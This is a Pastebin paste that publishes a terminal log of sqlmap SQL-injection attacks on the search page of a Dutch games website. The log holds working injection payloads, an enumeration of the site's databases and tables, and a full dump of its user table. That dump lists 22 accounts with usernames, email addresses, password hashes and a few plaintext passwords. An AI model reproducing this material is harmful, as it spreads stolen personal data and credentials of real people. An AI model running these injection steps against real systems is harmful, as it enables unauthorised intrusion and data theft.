Advertisement
Guest User

www.djoamersfoort.nl dump by CREATIVE_GAMER aka JDC aka Lolz

a guest
Mar 3rd, 2018
177
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.90 KB | None | 0 0
  1. root@kali:~# sqlmap -u http://www.bunnygames.djoamersfoort.nl/zoeken.php?search= --tables -D information_schema
  2. ___
  3. __H__
  4. ___ ___[(]_____ ___ ___ {1.1.12#stable}
  5. |_ -| . [.] | .'| . |
  6. |___|_ ["]_|_|_|__,| _|
  7. |_|V |_| http://sqlmap.org
  8.  
  9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  10.  
  11. [*] starting at 12:22:18
  12.  
  13. [12:22:18] [WARNING] provided value for parameter 'search' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
  14. [12:22:18] [INFO] resuming back-end DBMS 'mysql'
  15. [12:22:18] [INFO] testing connection to the target URL
  16. sqlmap resumed the following injection point(s) from stored session:
  17. ---
  18. Parameter: search (GET)
  19. Type: boolean-based blind
  20. Title: AND boolean-based blind - WHERE or HAVING clause
  21. Payload: search=%' AND 6237=6237 AND '%'='
  22.  
  23. Type: AND/OR time-based blind
  24. Title: MySQL >= 5.0.12 AND time-based blind
  25. Payload: search=%' AND SLEEP(5) AND '%'='
  26.  
  27. Type: UNION query
  28. Title: Generic UNION query (NULL) - 3 columns
  29. Payload: search=%' UNION ALL SELECT NULL,CONCAT(0x7170627171,0x4e5a4b496772544279447a6d727a48416171506175776a665a6454566b516451516c4670785a7355,0x7178717a71),NULL-- JKTq
  30. ---
  31. [12:22:18] [INFO] the back-end DBMS is MySQL
  32. web application technology: PHP 5.6.33, Apache 2
  33. back-end DBMS: MySQL >= 5.0.12
  34. [12:22:18] [INFO] fetching tables for database: 'information_schema'
  35. [12:22:19] [WARNING] reflective value(s) found and filtering out
  36. Database: information_schema
  37. [78 tables]
  38. +---------------------------------------+
  39. | ALL_PLUGINS |
  40. | APPLICABLE_ROLES |
  41. | CHANGED_PAGE_BITMAPS |
  42. | CHARACTER_SETS |
  43. | CLIENT_STATISTICS |
  44. | COLLATIONS |
  45. | COLLATION_CHARACTER_SET_APPLICABILITY |
  46. | COLUMNS |
  47. | COLUMN_PRIVILEGES |
  48. | ENABLED_ROLES |
  49. | ENGINES |
  50. | EVENTS |
  51. | FILES |
  52. | GEOMETRY_COLUMNS |
  53. | GLOBAL_STATUS |
  54. | GLOBAL_VARIABLES |
  55. | INDEX_STATISTICS |
  56. | INNODB_BUFFER_PAGE |
  57. | INNODB_BUFFER_PAGE_LRU |
  58. | INNODB_BUFFER_POOL_STATS |
  59. | INNODB_CHANGED_PAGES |
  60. | INNODB_CMP |
  61. | INNODB_CMPMEM |
  62. | INNODB_CMPMEM_RESET |
  63. | INNODB_CMP_PER_INDEX |
  64. | INNODB_CMP_PER_INDEX_RESET |
  65. | INNODB_CMP_RESET |
  66. | INNODB_FT_BEING_DELETED |
  67. | INNODB_FT_CONFIG |
  68. | INNODB_FT_DEFAULT_STOPWORD |
  69. | INNODB_FT_DELETED |
  70. | INNODB_FT_INDEX_CACHE |
  71. | INNODB_FT_INDEX_TABLE |
  72. | INNODB_LOCKS |
  73. | INNODB_LOCK_WAITS |
  74. | INNODB_METRICS |
  75. | INNODB_MUTEXES |
  76. | INNODB_SYS_COLUMNS |
  77. | INNODB_SYS_DATAFILES |
  78. | INNODB_SYS_FIELDS |
  79. | INNODB_SYS_FOREIGN |
  80. | INNODB_SYS_FOREIGN_COLS |
  81. | INNODB_SYS_INDEXES |
  82. | INNODB_SYS_SEMAPHORE_WAITS |
  83. | INNODB_SYS_TABLES |
  84. | INNODB_SYS_TABLESPACES |
  85. | INNODB_SYS_TABLESTATS |
  86. | INNODB_TABLESPACES_ENCRYPTION |
  87. | INNODB_TABLESPACES_SCRUBBING |
  88. | INNODB_TRX |
  89. | KEY_CACHES |
  90. | KEY_COLUMN_USAGE |
  91. | PARAMETERS |
  92. | PARTITIONS |
  93. | PLUGINS |
  94. | PROCESSLIST |
  95. | PROFILING |
  96. | REFERENTIAL_CONSTRAINTS |
  97. | ROUTINES |
  98. | SCHEMATA |
  99. | SCHEMA_PRIVILEGES |
  100. | SESSION_STATUS |
  101. | SESSION_VARIABLES |
  102. | SPATIAL_REF_SYS |
  103. | STATISTICS |
  104. | SYSTEM_VARIABLES |
  105. | TABLES |
  106. | TABLESPACES |
  107. | TABLE_CONSTRAINTS |
  108. | TABLE_PRIVILEGES |
  109. | TABLE_STATISTICS |
  110. | TRIGGERS |
  111. | USER_PRIVILEGES |
  112. | USER_STATISTICS |
  113. | VIEWS |
  114. | XTRADB_INTERNAL_HASH_TABLES |
  115. | XTRADB_READ_VIEW |
  116. | XTRADB_RSEG |
  117. +---------------------------------------+
  118.  
  119. [12:22:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.bunnygames.djoamersfoort.nl'
  120.  
  121. [*] shutting down at 12:22:19
  122.  
  123. root@kali:~# sqlmap -u http://www.bunnygames.djoamersfoort.nl/zoeken.php?search= --dbs
  124. ___
  125. __H__
  126. ___ ___[']_____ ___ ___ {1.1.12#stable}
  127. |_ -| . [.] | .'| . |
  128. |___|_ ["]_|_|_|__,| _|
  129. |_|V |_| http://sqlmap.org
  130.  
  131. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  132.  
  133. [*] starting at 12:23:14
  134.  
  135. [12:23:14] [WARNING] provided value for parameter 'search' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
  136. [12:23:14] [INFO] resuming back-end DBMS 'mysql'
  137. [12:23:14] [INFO] testing connection to the target URL
  138. sqlmap resumed the following injection point(s) from stored session:
  139. ---
  140. Parameter: search (GET)
  141. Type: boolean-based blind
  142. Title: AND boolean-based blind - WHERE or HAVING clause
  143. Payload: search=%' AND 6237=6237 AND '%'='
  144.  
  145. Type: AND/OR time-based blind
  146. Title: MySQL >= 5.0.12 AND time-based blind
  147. Payload: search=%' AND SLEEP(5) AND '%'='
  148.  
  149. Type: UNION query
  150. Title: Generic UNION query (NULL) - 3 columns
  151. Payload: search=%' UNION ALL SELECT NULL,CONCAT(0x7170627171,0x4e5a4b496772544279447a6d727a48416171506175776a665a6454566b516451516c4670785a7355,0x7178717a71),NULL-- JKTq
  152. ---
  153. [12:23:15] [INFO] the back-end DBMS is MySQL
  154. web application technology: PHP 5.6.33, Apache 2
  155. back-end DBMS: MySQL >= 5.0.12
  156. [12:23:15] [INFO] fetching database names
  157. available databases [2]:
  158. [*] information_schema
  159. [*] xanderh_www
  160.  
  161. [12:23:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.bunnygames.djoamersfoort.nl'
  162.  
  163. [*] shutting down at 12:23:15
  164.  
  165. root@kali:~# sqlmap -u http://www.bunnygames.djoamersfoort.nl/zoeken.php?search= --tables -D xanderh_www
  166. ___
  167. __H__
  168. ___ ___[)]_____ ___ ___ {1.1.12#stable}
  169. |_ -| . [.] | .'| . |
  170. |___|_ [(]_|_|_|__,| _|
  171. |_|V |_| http://sqlmap.org
  172.  
  173. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  174.  
  175. [*] starting at 12:23:26
  176.  
  177. [12:23:27] [WARNING] provided value for parameter 'search' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
  178. [12:23:27] [INFO] resuming back-end DBMS 'mysql'
  179. [12:23:27] [INFO] testing connection to the target URL
  180. sqlmap resumed the following injection point(s) from stored session:
  181. ---
  182. Parameter: search (GET)
  183. Type: boolean-based blind
  184. Title: AND boolean-based blind - WHERE or HAVING clause
  185. Payload: search=%' AND 6237=6237 AND '%'='
  186.  
  187. Type: AND/OR time-based blind
  188. Title: MySQL >= 5.0.12 AND time-based blind
  189. Payload: search=%' AND SLEEP(5) AND '%'='
  190.  
  191. Type: UNION query
  192. Title: Generic UNION query (NULL) - 3 columns
  193. Payload: search=%' UNION ALL SELECT NULL,CONCAT(0x7170627171,0x4e5a4b496772544279447a6d727a48416171506175776a665a6454566b516451516c4670785a7355,0x7178717a71),NULL-- JKTq
  194. ---
  195. [12:23:27] [INFO] the back-end DBMS is MySQL
  196. web application technology: PHP 5.6.33, Apache 2
  197. back-end DBMS: MySQL >= 5.0.12
  198. [12:23:27] [INFO] fetching tables for database: 'xanderh_www'
  199. [12:23:27] [WARNING] reflective value(s) found and filtering out
  200. Database: xanderh_www
  201. [27 tables]
  202. +-----------------------+
  203. | Gamemaker_highscore |
  204. | Gamemaker_highscore2 |
  205. | UfoShooter_hs |
  206. | user |
  207. | avoidgreen_hs |
  208. | bezoekers |
  209. | carsgame1 |
  210. | carsgame2 |
  211. | carsgame3 |
  212. | downloads |
  213. | henkjump_hs |
  214. | infhouthakker |
  215. | inflogin |
  216. | infvisser |
  217. | ip |
  218. | kill_hs |
  219. | likes |
  220. | mazegame |
  221. | paginas |
  222. | paginas2 |
  223. | plane_hs |
  224. | platform_maker_levels |
  225. | platformer_hs |
  226. | pointer_hs |
  227. | randomshoot_hs |
  228. | shoot_hs |
  229. | world_adventure_hs |
  230. +-----------------------+
  231.  
  232. [12:23:27] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.bunnygames.djoamersfoort.nl'
  233.  
  234. [*] shutting down at 12:23:27
  235.  
  236. root@kali:~# sqlmap -u http://www.bunnygames.djoamersfoort.nl/zoeken.php?search= --columns -D xanderh_www -T user
  237. ___
  238. __H__
  239. ___ ___[.]_____ ___ ___ {1.1.12#stable}
  240. |_ -| . [.] | .'| . |
  241. |___|_ [,]_|_|_|__,| _|
  242. |_|V |_| http://sqlmap.org
  243.  
  244. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  245.  
  246. [*] starting at 12:25:06
  247.  
  248. [12:25:06] [WARNING] provided value for parameter 'search' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
  249. [12:25:06] [INFO] resuming back-end DBMS 'mysql'
  250. [12:25:06] [INFO] testing connection to the target URL
  251. sqlmap resumed the following injection point(s) from stored session:
  252. ---
  253. Parameter: search (GET)
  254. Type: boolean-based blind
  255. Title: AND boolean-based blind - WHERE or HAVING clause
  256. Payload: search=%' AND 6237=6237 AND '%'='
  257.  
  258. Type: AND/OR time-based blind
  259. Title: MySQL >= 5.0.12 AND time-based blind
  260. Payload: search=%' AND SLEEP(5) AND '%'='
  261.  
  262. Type: UNION query
  263. Title: Generic UNION query (NULL) - 3 columns
  264. Payload: search=%' UNION ALL SELECT NULL,CONCAT(0x7170627171,0x4e5a4b496772544279447a6d727a48416171506175776a665a6454566b516451516c4670785a7355,0x7178717a71),NULL-- JKTq
  265. ---
  266. [12:25:07] [INFO] the back-end DBMS is MySQL
  267. web application technology: PHP 5.6.33, Apache 2
  268. back-end DBMS: MySQL >= 5.0.12
  269. [12:25:07] [INFO] fetching columns for table 'user' in database 'xanderh_www'
  270. [12:25:07] [WARNING] reflective value(s) found and filtering out
  271. Database: xanderh_www
  272. Table: user
  273. [8 columns]
  274. +--------------------+---------------+
  275. | Column | Type |
  276. +--------------------+---------------+
  277. | user_adres | varchar(200) |
  278. | user_avatar | varchar(400) |
  279. | user_email | varchar(6400) |
  280. | user_id | int(11) |
  281. | user_land | varchar(200) |
  282. | user_name | varchar(64) |
  283. | user_password_hash | varchar(225) |
  284. | user_woonplaats | varchar(200) |
  285. +--------------------+---------------+
  286.  
  287. [12:25:07] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.bunnygames.djoamersfoort.nl'
  288.  
  289. [*] shutting down at 12:25:07
  290.  
  291. root@kali:~# sqlmap -u http://www.bunnygames.djoamersfoort.nl/zoeken.php?search= --dump -D xanderh_www -T user
  292. ___
  293. __H__
  294. ___ ___[,]_____ ___ ___ {1.1.12#stable}
  295. |_ -| . ['] | .'| . |
  296. |___|_ [(]_|_|_|__,| _|
  297. |_|V |_| http://sqlmap.org
  298.  
  299. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  300.  
  301. [*] starting at 12:26:18
  302.  
  303. [12:26:18] [WARNING] provided value for parameter 'search' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
  304. [12:26:18] [INFO] resuming back-end DBMS 'mysql'
  305. [12:26:18] [INFO] testing connection to the target URL
  306. sqlmap resumed the following injection point(s) from stored session:
  307. ---
  308. Parameter: search (GET)
  309. Type: boolean-based blind
  310. Title: AND boolean-based blind - WHERE or HAVING clause
  311. Payload: search=%' AND 6237=6237 AND '%'='
  312.  
  313. Type: AND/OR time-based blind
  314. Title: MySQL >= 5.0.12 AND time-based blind
  315. Payload: search=%' AND SLEEP(5) AND '%'='
  316.  
  317. Type: UNION query
  318. Title: Generic UNION query (NULL) - 3 columns
  319. Payload: search=%' UNION ALL SELECT NULL,CONCAT(0x7170627171,0x4e5a4b496772544279447a6d727a48416171506175776a665a6454566b516451516c4670785a7355,0x7178717a71),NULL-- JKTq
  320. ---
  321. [12:26:18] [INFO] the back-end DBMS is MySQL
  322. web application technology: PHP 5.6.33, Apache 2
  323. back-end DBMS: MySQL >= 5.0.12
  324. [12:26:18] [INFO] fetching columns for table 'user' in database 'xanderh_www'
  325. [12:26:18] [INFO] fetching entries for table 'user' in database 'xanderh_www'
  326. [12:26:19] [WARNING] reflective value(s) found and filtering out
  327. Database: xanderh_www
  328. Table: user
  329. [22 entries]
  330. +---------+-----------+---------------------+------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------------+--------------------------------------------------------------+
  331. | user_id | user_land | user_name | user_adres | user_email | user_avatar | user_woonplaats | user_password_hash |
  332. +---------+-----------+---------------------+------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------------+--------------------------------------------------------------+
  333. | 8 | <blank> | Mirthe | <blank> | fliepsollie@gmail.com | http://bunnygames.djoamersfoort.nl/sys/login/avatars/banaan.gif.gif | <blank> | $2y$10$Ne8YEJ8V7p7X59nySwh4Pu.SQkTjgLXPsIdPEZN2jeWIxz2Bn7x/. |
  334. | 10 | <blank> | tamar | <blank> | t.heij@gunsteling.com | http://bunnygames.djoamersfoort.nl/sys/login/avatars/banaan.gif.gif | <blank> | $2y$10$tj/8Q36yrdIeZEd0NM5nQOSY.JgW8MT26BtXvIg1XrEkX27Rgw6I2 |
  335. | 11 | <blank> | dikkehenk | <blank> | h@enk.com | http://bunnygames.djoamersfoort.nl/sys/login/avatars/henhar.gif.gif | <blank> | $2y$10$040Gm8WsMJ3t.MSX6JXrP.sq9oH./O3SCEmLmsu6w5c5lH/urUIWy |
  336. | 13 | <blank> | meint | <blank> | jefuckingmoeder@gay.nl | http://bunnygames.djoamersfoort.nl/sys/login/avatars/banaan.gif.gif | <blank> | $2y$10$sFz2f56qGwLCWVcdkeAFh.Xg2H8Af2Ba9qqDYSZsffVSVd7LJgRVy |
  337. | 14 | <blank> | obama | <blank> | #obama@power.com | niks | <blank> | $2y$10$bGhIEXuNYpiAhWKDJSHireyxxXVRtyXDKpCatM9AE64hYXkCkEW7e |
  338. | 15 | <blank> | jurrienkiller | <blank> | tukkertje28@live.nl | http://bunnygames.djoamersfoort.nl/sys/login/avatars/tree.jpg | <blank> | $2y$10$JYXOEkYgqyjgOlteqjrM5uw66MeoXMcVKRwdmQgWPVfs4u0gs/AHe |
  339. | 16 | <blank> | jevader | <blank> | jemoeder@gmail.com | http://bunnygames.djoamersfoort.nl/sys/login/avatars/friet.png | <blank> | $2y$10$n1T7sBg4IRKQNbAFZ29lU.mCa.0udRi.k1TY9sp0OjLkPRwF4hqXO |
  340. | 17 | <blank> | wipeautcrafter | <blank> | wipeautlol@bunnygames.com | http://www.techtechnik.com/wp-content/uploads/2014/11/computer-hacker-break-the-security1.gif | <blank> | hacking.com |
  341. | 18 | <blank> | MrJesse | <blank> | janzwartesinterklaas@hotmail.com | https://www.google.com/search?q=google+grappig+plaatje&rlz=1C1GGGE___NL605NL605&es_sm=93&source=lnms&tbm=isch&sa=X&ved=0CAcQ_AUoAWoVChMI2dHpopaZyAIVS1cUCh05PQ9A&biw=1366&bih=705#imgrc=bDCGlVRuJ1GYmM: | <blank> | piet |
  342. | 19 | <blank> | hh | <blank> | h@hotmail.com | h | <blank> | $2y$10$dOKfFSZFF6U9cq.vgojrsOiADdDgoonmheghseqOy.53lZmhG9w3O |
  343. | 20 | <blank> | JemoederisdikXander | <blank> | jessevanbreden@gmail.com | http://bunnygames.djoamersfoort.nl/sys/login/avatars/banaan.gif.gif | <blank> | $2y$10$uxU.yQ4FaBTo8tmVQFuwV.daNbsfbgkvCreV.QXXyIE06BJZ0Poky |
  344. | 21 | <blank> | meint48 | <blank> | meintterpstra@hotmail.nl | test | <blank> | $2y$10$PChspbWC7YlhwLEJiJDgS.5UmCB2Z6lnks5eS0wCvCuZUdiBtgtki |
  345. | 22 | <blank> | StevenFar | <blank> | x.ez.ner@hceap.info | <blank> | <blank> | $2y$10$XjqAWpPoXJ5ac6iILUhhLOcCX7tV3zes4VOQjHFFcEW/e7gMZLZ6O |
  346. | 23 | <blank> | Shawntreag | <blank> | julio@1stbest.info | <blank> | <blank> | $2y$10$qgA0G9nw8QpPF1qJq25IS.DEJBBdxZx/9wUSf4EBV2ZfTQA3k71HO |
  347. | 24 | <blank> | Bryonmaymn | <blank> | s.leep.m.as.ter@top.bxox.info | <blank> | <blank> | $2y$10$.wegDWY8Pi62JFDXZGkDbu2y.19iCdjh9az5mqfWXg8XP7ofBIZtW |
  348. | 25 | <blank> | MiguelCoerb | <blank> | artr.ot.ok@netgas.info | <blank> | <blank> | $2y$10$i2X.MM0pSb1JNPFm6rgTxO4DMHjcVu6urHTnY9LiXvJGjar4ty42S |
  349. | 26 | <blank> | GeraldNib | <blank> | xe.z.n.er@hceap.info | <blank> | <blank> | $2y$10$BM0a7iXX1LXzsnAHR1n79uPGFCtJjbx.mTbr.Xnk2.pUgdkv.Zh36 |
  350. | 27 | <blank> | Jimmiemoosy | <blank> | x.e.zn.e.r@hceap.info | <blank> | <blank> | $2y$10$36sJpKnko1xIMZ4WZjnJj.sgCldhmHmdiXF5ldv2/69LFHGvPJSOC |
  351. | 28 | <blank> | Armandodow | <blank> | xezn.er@hceap.info | <blank> | <blank> | $2y$10$iXGsDpJw4rFEdi6OEXNi5eX9NT2E/JiYKvKeFFFNBcSOjvJPInbTG |
  352. | 29 | <blank> | LarryBeauh | <blank> | ti.ne.dol@artquery.info | <blank> | <blank> | $2y$10$CaM.Eet1UQRNAHvfGHbeYuqqM0y6d/CAOaTKK.X337AYwWK.rm9eK |
  353. | 30 | <blank> | Michaelpal | <blank> | man.g@bigatel.info | <blank> | <blank> | $2y$10$75l/YhBjdDik5McHQs0iQu7X/h8MF7zj/w6jpsUpAR4mPZKLvZODG |
  354. | 31 | <blank> | RandyOrAse | <blank> | b.ina.r.y@bxox.info | <blank> | <blank> | $2y$10$Vy1BC7F4sDrcVAB.4gd.Femc9ifvk4.Exm8ABB91NKEf0rKixjRvi |
  355. +---------+-----------+---------------------+------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------------+--------------------------------------------------------------+
  356.  
  357. [12:26:19] [INFO] table 'xanderh_www.`user`' dumped to CSV file '/root/.sqlmap/output/www.bunnygames.djoamersfoort.nl/dump/xanderh_www/user.csv'
  358. [12:26:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.bunnygames.djoamersfoort.nl'
  359.  
  360. [*] shutting down at 12:26:19
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement